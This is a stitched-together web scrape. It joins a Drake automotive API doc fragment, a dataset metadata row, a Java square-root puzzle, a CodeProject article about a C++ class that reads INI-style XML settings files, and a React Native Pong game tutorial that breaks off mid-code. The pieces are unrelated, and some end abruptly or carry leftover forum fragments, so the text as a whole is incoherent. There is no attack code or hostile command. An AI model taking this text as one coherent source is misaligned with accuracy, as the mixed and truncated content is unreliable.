Defines a time interval that is used to ensure a desired update time is always greater than (i.e., after) the current time.
Despite the spatial window provided by kLaneEndEpsilon, it is still possible for the vehicle to end up precisely at the end of its current lane (e.g., it could be initialized in this state). In this scenario, the next update time will be equal to the current time. The integrator, however, requires that the next update time be strictly after the current time, which is when this constant is used. The primary constraint on the selection of this constant is the application's sensitivity to a MaliputRailcar being "late" in its transition to an ongoing branch once it is at the end of its current lane. The smaller this value, the less "late" the transition will occur. This value cannot be zero since that will violate the integrator's need for the next update time to be strictly after the current time. | http://drake.mit.edu/doxygen_cxx/classdrake_1_1automotive_1_1_maliput_railcar.html | CC-MAIN-2018-43 | refinedweb | 383 | 54.32 |
One of the main reason that allowed us to developp the current notebook web application was to embrase the web technology.
By beeing a pure web application using HTML, Javascript and CSS, the Notebook can get all the web technology improvement for free. Thus, as browsers support for different media extend, The notebook web app should be able to be compatible without modification.
This is also true with performance of the User Interface as the speed of javascript VM increase.
The other advantage of using only web technology is that the code of the interface is fully accessible to the end user, and modifiable live. Even if this task is not always easy, we strive to keep our code as accessible and reusable as possible. This should allow with minimum effort to develop small extensions that customize the behavior of the web interface.
The first tool that is availlable to you and that you shoudl be aware of are browser "developpers tool". The exact naming can change across browser, and might require the installation of extensions. But basically they can allow you to inspect/modify the DOM, and interact with the javascript code that run the frontend.
Those will be your best friends to debug and try different approach for your extensions.
Above tools can be tedious to edit long javascipt files. Hopefully we provide the
%%javascript magic. This allows you to quickly inject javascript into the notebook. Still the javascript injected this way will not survive reloading. Hence it is a good tool for testing an refinig a script.
You might see here and there people modifying css and injecting js into notebook by reading file and publishing them into the notebook. Not only this often break the flow of the notebook and make the re-execution of the notebook broken, but it also mean that you need to execute those cells on all the notebook every time you need to update the code.
This can still be usefull in some cases, like the
%autosave magic that allows to control the time between each save. But this can be replaced by a Javascript dropdown menu to select save interval.
## you can inspect the autosave code to see what it does. %autosave??
To inject Javascript we provide an entry point:
custom.js that allow teh user to execute and load other resources into the notebook.
Javascript code in
custom.js will be executed when the notebook app start and can then be used to customise almost anything in the UI and in the behavior of the notebook.
custom.js can be found in IPython profile dir, and so you can have different UI modification on a per profile basis, as well as share your modfication with others.
You have been provided with an already existing profile folder with this tutorial... start the notebook from the root of the tutorial directory with :
$ ipython notebook --ProfileDir.location=./profile_euroscipy
profile_dir = ! ipython locate profile_dir = profile_dir[0] profile_dir
and custom js is in
import os.path custom_js_path = os.path.join(profile_dir,'profile_default','static','custom','custom.js')
# my custom js with open(custom_js_path) as f: for l in f: print l,
Note that
custom.js is ment to be modified by user, when writing a script, you can define it in a separate file and add a line of configuration into
custom.js that will fetch and execute the file.
Warning : even if modification of
custom.js take effect immediately after browser refresh (except if browser cache is aggressive), creating a file in
static/ directory need a server restart.
Create a
custom.js in the right location with the following content:
alert("hello world from custom.js")
Restart your server and open any notebook.
We've seen above that you can change the autosave rate by using a magic. This is typically something I don't want to type everytime, and that I don't like to embed into my workwlow and documents. (reader don't care what my autosave time is), let's build an extension that allow to do it.
Create a dropdow elemement in the toolbar (DOM
IPython.toolbar.element), you will need
IPython.notebook.set_autosave_interval(miliseconds) // ... }
I like my cython to be nicely highlighted
traitlets.config.cell_magic_highlight['magic_text/x-cython'] = {} traitlets.
Sadly you will have to read the js source file (but there are lots of comments) an/or build the javascript documentation using yuidoc.
If you have
node and
yui-doc installed:
$ cd ~/ipython/IPython/html/static/notebook/js/ $ yuidoc . --server warn: (yuidoc): Failed to extract port, setting to the default :3000 info: (yuidoc): Starting [email protected] using [email protected] with [email protected] docs
By browsing the doc you will see that we have soem convenience methods that avoid to re-invent the UI everytime :
IPython.toolbar.add_buttons_group([ { 'label' : 'run qtconsole', 'icon' : 'icon-terminal', // select your icon from // 'callback': function(){IPython.notebook.kernel.execute('%qtconsole')} } // add more button here if needed. ]);
with a lot of icons you can select from.
The most requested feature is generaly to be able to distinguish individual cell in th enotebook, or run specific action with them.
To do so, you can either use
IPython.notebook.get_selected_cell(), or rely on
CellToolbar. This allow you to register aset of action and graphical element that will be attached on individual cells.
You can see some example of what can be done by toggling the
Cell Toolbar selector in the toolbar on top of the notebook. It provide two default
presets that are
Default and
slideshow. Default allow edit the metadata attached to each cell manually.
First we define a function that takes at first parameter an element on the DOM in which to inject UI element. Second element will be the cell this element will be registerd with. Then we will need to register that function ad give it a name.
%%javascript var CellToolbar = IPython.CellToolbar var toggle = function(div, cell) { var button_container = $(div) // let's create a button that show);
This function can now be part of many
preset of the CellToolBar.
%%javascript IPython.CellToolbar.register_preset('Tutorial 1',['tuto.foo','default.rawedit']) IPython.CellToolbar.register_preset('Tutorial 2',['slideshow.select','tuto.foo'])
You should now have access to two presets :
And check that the buttons you defin share state when you toggle preset. Check moreover that the metadata of the cell is modified when you clisk the button, and that when saved on reloaded the metadata is still availlable.
Try to wrap the all code in a file, put this file in
{profile}/static/custom/<a-name>.js, and add
require(['custom/<a-name>']);
in
custom.js to have this script automatically loaded in all your notebooks.
require is provided by a javascript library that allow to express dependency. For simple extension like the previous one we directly mute the global namespace, but for more complexe extension you could pass acallback'); })
Try to use the following to bind a dropdown list to
cell.metadata.difficulty.select.
It should be able to take the 4 following values :
<None>
Easy
Medium
Hard
We will use it to customise the output of the converted notebook depending of the tag on each cell
%load soln/celldiff.js | https://nbviewer.jupyter.org/github/ipython/ipython/blob/rel-4.0.1/examples/Notebook/JavaScript%20Notebook%20Extensions.ipynb | CC-MAIN-2019-18 | refinedweb | 1,195 | 55.44 |
This section will give you examples of how divert sockets can be used and how they are different of other packet interception mechanisms out there.
There are other mechanisms out there that have similar functionality. Here is why they are different:
Netlink sockets can intercept packets just like divert sockets by using firewall filter. They have a special type (AF_NETLINK) and on the surface seem to do the same thing. Two major differences are:
RAW sockets can be a good way to listen in on traffic (especially under Linux, where RAW sockets can listen in on TCP and UDP traffic, although most other UNI*s do not allow that) but a RAW socket can't stop a packet from propagating through the IP stack - it simply gives you a copy of the packet and there is no way to inject it inbound (on the way up the stack) - only outbound. Also, you can only filter pockets out by the protocol number, which you specify when you open a RAW socket. There is no link between the firewall and RAW sockets.
More commonly known for the tool it facilitates - tcpdump, libpcap lets you listen in on traffic that hits your interface (whether it be ppp or eth or whatever). For ethernet it can also put your NIC into a promiscuous mode, so that it will forward to IP the traffic that not only is link-layer addressed to it, but to others on the same segment. Of course, libpcap allows for no way of actually stopping packets from propagating and no way to inject. In fact, libpcap is in many ways orthogonal to divert sockets.
Linux provides you with three default chains: input, output and forward. There are also accounting chains, but they are of no consequence here. Depending on the packet origin it traverses one or more of these chains:
is traversed by all packets that come into the host - packets that are addressed to it and packets that will be forwarded by it.
is traversed by all packets originating in the host and by all forwarded packets
is traversed only by the forwarded packets.
The order in which a forwarded packet traverses the chains is:
As a rule of thumb, forward chain should only be used to filter packets that are forwarded and are not originating and are not addressed to your host. If you are interested in a combination of both forwarded packets and packets that are originating or addressed to your host, then use input or output chain instead. Intercepting on forward and input or output chain for the same type of packet at the same time will create problems in reinjection and, more importantly, is unnecessary.
The patched version of ipchains that you will need to retrieve from the website, is the tool that allows you to modify firewall rules from a shell (most people want that). It is also possible to set up firewall rules programmatically. See the example code for this - setting up a DIVERT rule would be similar to setting up a REDIRECT rule - specify DIVERT as a target and the divert port and you are set to go.
The ipchains syntax for setting up firewall rules remains the same. To specify a
DIVERT rule you must specify
-j DIVERT <port num> as a target, everything else
remains the same. For instance
would set up a divert rule for ICMP packets to be diverted from input chain to a port 1234.would set up a divert rule for ICMP packets to be diverted from input chain to a port 1234.
ipchains -A input -p ICMP -j DIVERT 1234
The following section explains how to use ipchains in conjunction with an interceptor user-space program.
Here is an example program that reads packets from a divert socket, displays them and then reinjects them back. It requires that the divert port is specified on the command line.
#include <stdio.h> #include <errno.h> #include <limits.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <getopt.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <signal.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/udp.h> #include <net/if.h> #include <sys/param.h> #include <linux/types.h> #include <linux/icmp.h> #include <linux/ip_fw.h> #define IPPROTO_DIVERT 254 #define BUFSIZE 65535 char *progname; #ifdef FIREWALL char *fw_policy="DIVERT"; char *fw_chain="output"; struct ip_fw fw; struct ip_fwuser ipfu; struct ip_fwchange ipfc; int fw_sock; /* remove the firewall rule when exit */ void intHandler (int signo) { if (setsockopt(fw_sock, IPPROTO_IP, IP_FW_DELETE, &ipfc, sizeof(ipfc))==-1) { fprintf(stderr, "%s: could not remove rule: %s\n", progname, strerror(errno)); exit(2); } close(fw_sock); exit(0); } #endif int main(int argc, char** argv) { int fd, rawfd, fdfw, ret, n; int on=1; struct sockaddr_in bindPort, sin; int sinlen; struct iphdr *hdr; unsigned char packet[BUFSIZE]; struct in_addr addr; int i, direction; struct ip_mreq mreq; if (argc!=2) { fprintf(stderr, "Usage: %s <port number>\n", argv[0]); exit(1); } progname=argv[0]; fprintf(stderr,"%s:Creating a socket\n",argv[0]); /* open a divert socket */ fd=socket(AF_INET, SOCK_RAW, IPPROTO_DIVERT); if (fd==-1) { fprintf(stderr,"%s:We could not open a divert socket\n",argv[0]); exit(1); } bindPort.sin_family=AF_INET; bindPort.sin_port=htons(atol(argv[1])); bindPort.sin_addr.s_addr=0; fprintf(stderr,"%s:Binding a socket\n",argv[0]); ret=bind(fd, &bindPort, sizeof(struct sockaddr_in)); if (ret!=0) { close(fd); fprintf(stderr, "%s: Error bind(): %s",argv[0],strerror(ret)); exit(2); } #ifdef FIREWALL /* fill in the rule first */ bzero(&fw, sizeof (struct ip_fw)); fw.fw_proto=1; /* ICMP */ fw.fw_redirpt=htons(bindPort.sin_port); fw.fw_spts[1]=0xffff; fw.fw_dpts[1]=0xffff; fw.fw_outputsize=0xffff; /* fill in the fwuser structure */ ipfu.ipfw=fw; memcpy(ipfu.label, fw_policy, strlen(fw_policy)); /* fill in the fwchange structure */ ipfc.fwc_rule=ipfu; memcpy(ipfc.fwc_label, fw_chain, strlen(fw_chain)); /* open a socket */ if ((fw_sock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1) { fprintf(stderr, "%s: could not create a raw socket: %s\n", argv[0], strerror(errno)); exit(2); } /* write a rule into it */ if (setsockopt(fw_sock, IPPROTO_IP, IP_FW_APPEND, &ipfc, sizeof(ipfc))==-1) { fprintf(stderr, "%s could not set rule: %s\n", argv[0], strerror(errno)); exit(2); } /* install signal handler to delete the rule */ signal(SIGINT, intHandler); #endif /* FIREWALL */ printf("%s: Waiting for data...\n",argv[0]); /* read data in */ sinlen=sizeof(struct sockaddr_in); while(1) { n=recvfrom(fd, packet, BUFSIZE, 0, &sin, &sinlen); hdr=(struct iphdr*)packet; printf("%s: The packet looks like this:\n",argv[0]); for( i=0; i<40; i++) { printf("%02x ", (int)*(packet+i)); if (!((i+1)%16)) printf("\n"); }; printf("\n"); addr.s_addr=hdr->saddr; printf("%s: Source address: %s\n",argv[0], inet_ntoa(addr)); addr.s_addr=hdr->daddr; printf("%s: Destination address: %s\n", argv[0], inet_ntoa(addr)); printf("%s: Receiving IF address: %s\n", argv[0], inet_ntoa(sin.sin_addr)); printf("%s: Protocol number: %i\n", argv[0], hdr->protocol); /* reinjection */ #ifdef MULTICAST if (IN_MULTICAST((ntohl(hdr->daddr)))) { printf("%s: Multicast address!\n", argv[0]); addr.s_addr = hdr->saddr; errno = 0; if (sin.sin_addr.s_addr == 0) printf("%s: set_interface returns %i with errno =%i\n", argv[0], setsockopt(fd, IPPROTO_IP, IP_MULTICAST_IF, &addr, sizeof(addr)), errno); } #endif #ifdef REINJECT printf("%s Reinjecting DIVERT %i bytes\n", argv[0], n); n=sendto(fd, packet, n ,0, &sin, sinlen); printf("%s: %i bytes reinjected.\n", argv[0], n); if (n<=0) printf("%s: Oops: errno = %i\n", argv[0], errno); if (errno == EBADRQC) printf("errno == EBADRQC\n"); if (errno == ENETUNREACH) printf("errno == ENETUNREACH\n"); #endif } }
You can simply cut-n-paste the code and compile it with your favorite compiler. If you want to enable reinjection - compile it with the -DREINJECT flag, otherwise it will only do the interception.
In order to get it to work, compile the kernel and ipchains-1.3.8 as described above. Insert a rule into any of the firewall chains: input, output or forward, then send the packets that would match the rule and watch them as they fly through the screen - your interceptor program will display them and then reinject them back, if appropriately compiled.
For example:
will divert and display all TCP packets originating on host 172.16.128.10 (for instance if your host is a gateway). It will intercept them on the output just before they go on the wire.will divert and display all TCP packets originating on host 172.16.128.10 (for instance if your host is a gateway). It will intercept them on the output just before they go on the wire.
ipchains -A output -p TCP -s 172.16.128.10 -j DIVERT 4321 interceptor 4321
If you did not compile the pass through option into the kernel, then inserting the rule effectively will create a DENY rule in the firewall for the packets you specified until you start the interceptor program. See more on that above
If you want to set a firewall rule through your program, compile it with -DFIREWALL option and it will divert all ICMP packets from the output chain. It will also remove the DIVERT rule from the firewall when you use Ctrl-C to exit the program. In this case using pass-through vs. non-pass-through divert sockets makes virtually no difference.
As far as what you can use divert sockets for - your imagination would be the limiting factor. I would be interested to hear about applications that utilize divert sockets.
So, have fun! | http://www.redhat.com/mirrors/LDP/HOWTO/Divert-Sockets-mini-HOWTO-6.html | CC-MAIN-2013-20 | refinedweb | 1,579 | 54.83 |
At the moment, I am creating this program to ask the user for input. The user will give a number (to be added to sum and then divided by n to find the mean) or the letter "e" (to terminate the program). The program should take multiple numbers until an "e" is given.
This is the underlying concept but I'm not really there yet. I'm having some trouble getting my main and Scanner to cooperate so any help would be appreciated, thank you.
//package homework1; import java.util.Scanner; public class hmwk1 { public static void main(String[] args) { partA(); } public static void partA() { int n = 0; double mean = 0; double sum = 0; String input; System.out.println("Enter a number or enter 'e' to quit:"); Scanner kb = new Scanner(System.in); input = kb.next(); while(!(input.equals("e"))) { if(!(input.equals("e"))) { double d = Double.parseDouble(input); if(d >= 10 && d <= 100) { sum += d; n++; } else { System.out.println("Not in range"); } } /*System.out.println("Enter a number or enter 'e' to quit:"); String input2 = kb.next(); if(!input2.equals("e")) { double d = Double.parseDouble(input); }*/ } mean = sum / n; System.out.println(mean); System.exit(0); } } | http://www.javaprogrammingforums.com/whats-wrong-my-code/35631-experiencing-problems-w-scanner-main-open-any-assistance.html | CC-MAIN-2015-11 | refinedweb | 198 | 52.15 |
Java Puzzle: Square Root
Show your Java-fu by calculating the unknown.
Written by Wouter Coekaerts.
There are several algorithms to calculate a square root. But to solve this puzzle, you’ll need a different approach.
Can you find the square root of a huge number, without even looking at it?
package square**;** import java.math.BigInteger; import java.security.SecureRandom; public class SquareRoot { public static final int BITS = 10000; private static BigInteger n = new BigInteger(BITS, new SecureRandom()).pow(2); public static void answer(BigInteger root) { if (n.divide(root).equals(root)) { // The goal is to reach this line System.out.println("Square root!"); } } }
Write a class that calls SquareRoot.answer, and reaches that line in the code. The rules:
- Using setAccessible takes all the fun out of the problem, so your code must run with the security manager enabled (java -Djava.security.manager your.Class).
- Solve the problem in a single separate .java file which compiles and runs with JDK 6 or 7.
- Finding and exploiting security vulnerabilities in the JDK itself is interesting, but not the point of this puzzle.
Put your solution in a secret gist, and add a link to it in a comments below. To give everyone a chance to participate without spoilers the comments will stay private for a week.
Good luck!
Update: See this post about the solution Wouter Coekaerts Follow the latest activity of Wouter Coekaerts on Medium to see their stories and recommends.medium.com | https://developer.squareup.com/blog/java-puzzle-square-root/ | CC-MAIN-2019-26 | refinedweb | 245 | 59.6 |
Dice Throw Problem (Dynamic Programming)
Get FREE domain for 1st year and build your brand new site
There are d dice each having f faces. We need to find the number of ways in which we can get sum s from the faces when the dice are rolled.
Let us first understand the problem with an example-
- If there are 2 dice with 2 faces, then to get the sum as 3, there can be 2 ways-
- 1st die will have the value 1 and 2nd will have 2.
- 1st die will be faced with 2 and 2nd with 1.
Hence, for f=2, d=2, s=3, the answer will be 2.
Approach -
1) BRUTE FORCE -
The naive approach is to find all the possible combinations using for loops for each dice and then calculating the sum of all the faces, to check if we get the value as s. We will use another variable to keep count of how many times we get sum as s, and the value of this count variable will be our answer.
However, this approach is very time consuming and lengthy and its time complexity will depend on the number of dice.
Time complexity: O(d^2 * f) as:
- There are d * f combinations
- For each combination, we will need O(d) time to get the sum
2) DP Approach -
We can solve this problem efficiently with Dynamic Programming. For that, we need to first understand the basic structure -
Let the function for number of ways to find sum s from d dice with f faces be Sum(f,d,s)
Sum(f,d,s) = [getting sum (s-1) from (d-1) dice when dth die has value 1] + [getting sum(s-2) from (d-1) dice when dth die has value 2] + [getting sum(s-3) from (d-1) dice when dth die has value 3] + ................................................................. + [getting sum(s-f) from (d-1) dice when dth die has value f]
The dth die can have the maximum value f as there are only f faces in the dice.
Let us understand this concept with an example :
- f = 5, d = 3, s = 8
Hence, we have 3 dice with 5 faces, and we need to find the number of ways to get the sum as 8.
Sum(5,3,8) = 3rd die getting 1 + 3rd die getting 2 + 3rd die getting 3 + ...... + 3rd die getting 5 Sum(5,3,8) = Sum(5,2,7) + Sum(5,2,6) + Sum(5,2,5) + Sum(5,2,4) + Sum(5,2,3) //The 3rd die can have maximum value of 5, as there are 5 faces. Hence we'll stop at Sum(5,2,3) Also, Sum(5,3,7) = Sum(5,2,6) + Sum(5,2,5) + Sum(5,2,4) + Sum(5,2,3) + Sum(5,2,2) //With 2 dice, the minimum sum must be 2. Hence, we get- Sum(5,3,8) = Sum(5,3,7) + Sum(5,2,7) Therefore, in general terms - Sum(f,d,s) = Sum(f,d,s-1) + Sum(f,d-1,s-1) We can further find Sum(5,2,7) as- Sum(5,2,7) = Sum(5,1,6) + Sum(5,1,5) + Sum(5,1,4) + Sum(5,1,3) + Sum(5,1,2) However, Sum(5,1,6) = 0, as we can't have a sum of 6 with 1 die having 5 faces. Therefore, Sum(5,2,7) = Sum(5,1,5) + Sum(5,1,4) + Sum(5,1,3) + Sum(5,1,2)
This process continues throughout the whole equation.
- Sum(f,1,s) will always be 1 when s<=f, as with one die, there is only one way to get sum s.
- Sum(f,1,s) will be 0 when s>f, as there are not sufficient number of faces or dice, to get sum s. So, there are 0 ways.
Hence, is our example -
Sum(5,2,7) = 1 + 1 + 1 + 1 = 4
In this way, we can call each function and eventually find the Sum(5,3,8). We will store all the values in a 2d table[i][j] where i will go upto d and j will upto s. We will use this dp table[i][j] to find other values and so on..
Hence, we need a base value-
Sum(f,0,0) = 1
i.e table[0][0] = 1
- Time Complexity: O(n * x)
where n is number of dice and x is given sum.
Code
The following is the code of the abouve problem in C++
#include<bits/stdc++.h> using namespace std; long numOfWays(int f, int d, int s) { //Creata a 2d table with one extra row and column for simplicity. long table[d + 1][s + 1]; //Initialise the table with 0. memset(table,0,sizeof table); // Base value table[0][0] = 1; // Iterate over dice for (int i = 1; i <= d; i++) { // Iterate over sum for (int j = i; j <= s; j++) { //general equation to obtain Sum(f,s,d) table[i][j] = table[i][j - 1] + table[i - 1][j - 1]; //Some extra values are added when j>f // i.e when sum to be found is greater than the number of faces. // Such values need to removed. if (j > f) table[i][j] -= table[i - 1][j - f - 1]; } } return table[d][s]; } int main(){ cout << numOfWays(4, 2, 1) << endl; cout << numOfWays(2, 2, 3) << endl; cout << numOfWays(6, 3, 8) << endl; cout << numOfWays(5, 3, 8) << endl; cout << numOfWays(4, 2, 5) << endl; cout << numOfWays(4, 3, 5) << endl; }
Output -
0 2 21 18 4 6
Workflow -
Let us walkthrough the code with our previous example - Sum(5,3,8)
We are using nested for loops to traverse through the table, where i denotes number of dice, and j denotes the sum to find.
We are computing the sum and storing it in the table with our general formula-
Sum(f,d,s) = Sum(f,d,s-1) + Sum(f,d-1,s-1)
Hence,
table[i][j] = table[i][j-1] + table[i-1][j-1]
We are starting from i=1 and j=1, and finding all the values of table[i][j] till we reach i=d and j=s.
However, for some cases, extra values are added according to this general equation.
- For example, from our code, we can see that -
Sum(5,1,6) = Sum(5,1,5) + Sum(5,0,5) = 1
table[1][6] = table[1][5] + table[0][5] = 1 + 0 = 1
But with 1 die having 5 faces, we can't get a sum of 6.
This extra value is removed by checking the if condition-
If (j>f) i.e 6>5
hence, table[1][6] = table[1][6] - table[0][0] = 1-1 = 0
As we traverse through the 2 loops, we will calculate the value of the number of ways and store it in table[i][j] to find further values.
Hence, we will get the final answer for Sum(5,3,8) from table[3][8].
table[3][8] = 18
Therefore, the number of ways to get sum 8 with 3 dice having 5 faces is 18. | https://iq.opengenus.org/dice-throw-problem/ | CC-MAIN-2021-43 | refinedweb | 1,206 | 71.99 |
I hate putting stuff in the registry. It's not portable, it just adds bulk that's only needed by my application, and it's problematic to backup in case you want to move the app to another machine or easily recover from a reformat/reinstall of Windows. However, every time I mention "put it in an INI file", all of the zealots here on CP complain the INI files are obsolete, and we should always use the registry. Yeah, right, blah blah blah.
I will however admit that INI files are limited in their functionality in a number of ways. They can't be bigger than 64k in size, and data items can be no longer than 256 characters. They can also be difficult to use if you want to do anything more than simply setting/getting data from them. Finally, Microsoft could, at any time, remove the API functions that support them. These are the primary reasons that I wrote the CProfile class.
CProfile
This class reads XML files that are formatted in a style similar to INI files. In other words, give the following INI file contents:
[GENERAL]
setting1=0
setting2=test
[SPECIAL]
setting1=spider
setting2=0.12345
... the XML version supported by CProfile would look like this:
<xml>
<GENERAL>
<setting1>0</setting1>
<setting2>test</setting2>
</GENERAL>
<SPECIAL>
<setting1>spider</setting1>
<setting2>0.12345</setting2>
</SPECIAL>
</xml>
Since the class is simply trying to emulate the functionality of INI files, all top-level nodes are considered to be evquivalant to INI sections, and each "section" contains one or more child nodes (the same thig as INI "keys"). Child nodes under the keys are ignored - remember, we're just emulating INI files, not an all-encompassing XML file reader. I kept this within the context of an INI file because that's all I need. If you want to make this all-encompassing, have at it, but don't ask me to do it for you. You're a programmer - make it fit your needs.
CProfile maintains a CTypedPtrArray of profile items. Each profile item contains three CStrings - its section, its key name, and its value. Converting to and from the desired intrinsic type is handled in a series of overloaded Set/Get functions.
CTypedPtrArray
The class uses MSXML.DLL and imports the typelib. This way, I don't have to worry about any weird (and often unreliable) XML parsing classes that may only partially implement what's needed to properly parse a XML file. The only thing you have to remember to do is to call CoInitialize() before you call the CProfile::Load() function (and remember to call CoUninitialize() before exiting your app). I just stick a call to CoInitialize() at the top of my InitInstance() function, and CoUninitialize() in my ExitInstance() function - nice and tidy.
CoInitialize()
CProfile::Load()
CoUninitialize()
InitInstance()
ExitInstance()
Using CProfile is a simple matter of creating a variable somewhere in your application like so:
#include <span class="code-string">"Profile.h"</span>
CProfile m_profile;
...and then loading the file:
m_profile.Load("");
When you call CProfile::Load(), you need to supply string that represents a file name. If the filename is blank or is not a complete path/filename, the class will attempt to "normalize" the filename in the following ways:
In the end, an acceptable filename should always be the result. The file does not have to exist, but the path must.
After the profile is loaded, you can access the data. If you attempt to retrieve a value whose section/key does not yet exist, that section/key/value is added to the list of values maintained within CProfile. If you try to set a section/key/value that doesn't exist, it will be automatically created and added to the list.
By default, CProfile will automatically save its data when it goes out of scope. If you don't want this functionality, simply include this line anytime within the current scope.
CProfile::SetAutoSave(false);
The class will not save until either you explicitly call the Save() function, or the CProfile object goes out of scope (and auto-save is turned on).
Save()
By default, if you try to get or set a value for a key that doesn't exist, CProfile will automatically create the key in the list. This duplicates the functionality of the Get/SetPrivateProfileString API for INI files. However, you can turn that functionality on and off for sets, gets, or both by calling the appropriate toggle function:
CProfile::SetAddOnFailedGets(bool)
CProfile::SetAddOnFailedSets(bool)
The default value is true for both toggles.
If you want to make sure that your xml file loaded as expected, there are two built-in functions in CProfile that show the contents of the internal list - ShowContentsByRange() and ShowContentsBySection().
ShowContentsByRange()
ShowContentsBySection()
The "ByRange" function allows you to view all of the items within the specified index range. If you don't pass any range info at all, it assumes you want to see all of the items. Normally this shouldn't be a problem, but just in case you have a billion keys, you can specify a smaller range of items to view.
ByRange
The "BySection" function shows all keys for the specified section. Again, this shouldn't normally be a problem, but if you have over 25 keys in a given section, you should consider writing an overload of this function that also accepts a non-optional set of range parameters.
BySection
I've also included some code that supports filename manipulation. It is provided only to support CProfile and discussion of that code is not within the context of this article. Feel free to talk amongst yourselves, but I won't be fielding any questions about it.
So there it is - nothing fancy and definitely not hard to use or understand. I'm sure there's something in this code that someone won't like, so instead of complaining about it, be a programmer and change it to suit your needs. Good luck.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
"C:\Program Files\<application>\Setup.xml"
Setup.ini
Mike O`Neill wrote:Under Vista, however, for standard users, the Vista UAC security model locks down directories like C:/Program Files etc. In other words, programs are not supposed to create/modify files like "C:\Program Files\\Setup.xml" (or Setup.ini).
For continued support of legacy applications, Microsoft implemented the idea of "UAC virtualization", where files are not stored where the program thinks they're stored. See, for example, A Closer Look at Windows Vista, Part I: Security Changes[^].
Mike O`Neill wrote:For those of us who truly deplore the over-use of the registry, what should we do in the future?
Mike O`Neill wrote:Microsoft has warned developers that we should not depend on the existence of UAC virtualization in future releases of Windows, and that we should start to "fit in" to their preferred model of initialization (i.e., the registry).
<Settings>
<GLOBAL>
<Setting1>setting1</Setting1>
<Setting3>
<Value>one</Value>
<Value>two</Value>
<Value>three</Value>
</Setting3>
</GLOBAL>
</Settings>
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/Articles/17353/XML-Application-Profile-Class?fid=379856&df=90&mpp=10&noise=1&prof=True&sort=Position&view=Expanded&spc=None | CC-MAIN-2015-18 | refinedweb | 1,223 | 60.95 |
Create a two-player Pong game with React Native
You will need Node 11+, Yarn and React Native 0.57.8+ installed on your machine.
In this tutorial, we’ll re-create the classic video game “Pong”. For those unfamiliar, Pong is short for Ping-pong. It’s another term for table tennis in which two players hit a lightweight ball back and forth across a table using small rackets. So Pong is basically the video game equivalent of the sport.
Prerequisites
Basic knowledge of React Native and React Navigation is required. We’ll also be using Node, but knowledge is optional since we’ll only use it minimally.
We’ll be using the following package versions:
- Yarn 1.13.0
- Node 11.2.0
- React Native 0.57.8
- React Native Game Engine 0.10.1
- MatterJS 0.14.2
For compatibility reasons, I recommend you to install the same package versions used in this tutorial before trying to update to the latest ones.
We’ll be using Pusher Channels in this tutorial. So you should know how to create and set up a new app instance on their website. The only requirement is for the app to allow client events. You can enable it from your app settings page.
Lastly, you’ll need an ngrok account, so you can use it for exposing the server to the internet.
App overview
We’ll re-create the Pong game with React Native and Pusher Channels. Users have to log in using a unique username before they can start playing the game. The server is responsible for signaling for when an opponent is found and when the game starts. Once in the game, all the users have to do is land the ball on their opponent’s base and also prevent them from landing the ball on their base. For the rest of the tutorial, I’ll be referring to the object which the users will move as “plank”.
Here’s what it will look like:
You can find the code on this GitHub repo.
Creating the app
Start by initializing a new React Native project:
react-native init RNPong cd RNPong
Once the project is created, open your
package.json file and add the following to your dependencies:
"dependencies": { "matter-js": "^0.14.2", "pusher-js": "^4.3.1", "react-native-game-engine": "^0.10.1", "react-native-gesture-handler": "^1.0.12", "react-navigation": "^3.0.9", // your existing dependencies.. }
Execute
yarn install to install the packages.
While that’s doing its thing, here’s a brief overview of what each package does:
- matter-js - a JavaScript physics engine. This allows us to simulate how objects respond to applied forces and collisions. It’s responsible for animating the ball and the planks as they move through space.
- pusher-js - used for sending realtime messages between the two users so the UI stays in sync.
- react-native-game-engine - provides useful components for effectively managing and rendering the objects in our game. As you’ll see later, it’s the one which orchestrates the different objects so they can be managed by a system which specifies how the objects will move or react to collisions.
- react-navigation - for handling navigation between the login and the game screen.
- react-native-gesture-handler - you might think that we’re using it for handling the swiping motion for moving the planks. But the truth is we don’t really need this directly. react-navigation uses it for handling gestures when navigating between pages.
Once that’s done, link all the packages with
react-native link.
Next, set the permission to access the network state and set the orientation to
landscape:
// android/app/src/main/AndroidManifest.xml <manifest ...> <uses-permission android: <uses-permission android: <uses-permission android: <application android:name=".MainApplication" ... > <activity android:name=".MainActivity" android:screenOrientation="landscape" ... > ... </activity> </application> </manifest>
React Navigation boilerplate code
Start by adding the boilerplate code for setting up React Navigation. This includes the main app file and the root file for specifying the app screens:
// App.js import React, { Component } from "react"; import { View } from "react-native"; import Root from "./Root"; export default class App extends Component { render() { return ( <View style={styles.container}> <Root /> </View> ); } } const styles = { container: { flex: 1 } }; // Root.js import React, { Component } from "react"; import { YellowBox } from 'react-native'; import { createStackNavigator, createAppContainer } from "react-navigation"; import LoginScreen from './src/screens/Login'; import GameScreen from './src/screens/Game'; // to suppress timer warnings (has to do with Pusher) YellowBox.ignoreWarnings([ 'Setting a timer' ]); const RootStack = createStackNavigator( { Login: LoginScreen, Game: GameScreen }, { initialRouteName: "Login" } ); const AppContainer = createAppContainer(RootStack); class Router extends Component { render() { return ( <AppContainer /> ); } } export default Router;
If you don’t know what’s going on with the code above, be sure to check out the React Navigation docs.
Login screen
We’re now ready to add the code for the login screen of the app. Start by importing the things we need. If you haven’t created a Pusher app instance yet, now is a good time to do so. Then replace the placeholders below. As for the ngrok URL, you can add it later once we run the app:
// src/screens/Login.js import React, { Component } from "react"; import { View, Text, TextInput, TouchableOpacity, Alert } from "react-native"; import Pusher from 'pusher-js/react-native'; const pusher_app_key = 'YOUR PUSHER APP KEY'; const pusher_app_cluster = 'YOUR PUSHER APP CLUSTER'; const base_url = 'YOUR HTTPS NGROK URL';
Next, initialize the state and instance variables that we’ll be using:
class LoginScreen extends Component { static navigationOptions = { title: "Login" }; state = { username: "", enteredGame: false }; constructor(props) { super(props); this.pusher = null; this.myChannel = null; } // next: add render method }
In the
render method, we have the login form:> ); }
When the Login button is clicked, we authenticate the user through the server. This is a requirement for Pusher apps that communicate directly from the client side. So to save on requests, we also submit the
username as an additional request parameter. Once the app receives a response from the server, we subscribe to the current user’s own channel. This allows the app to receive messages from the server, and from their opponent later on:
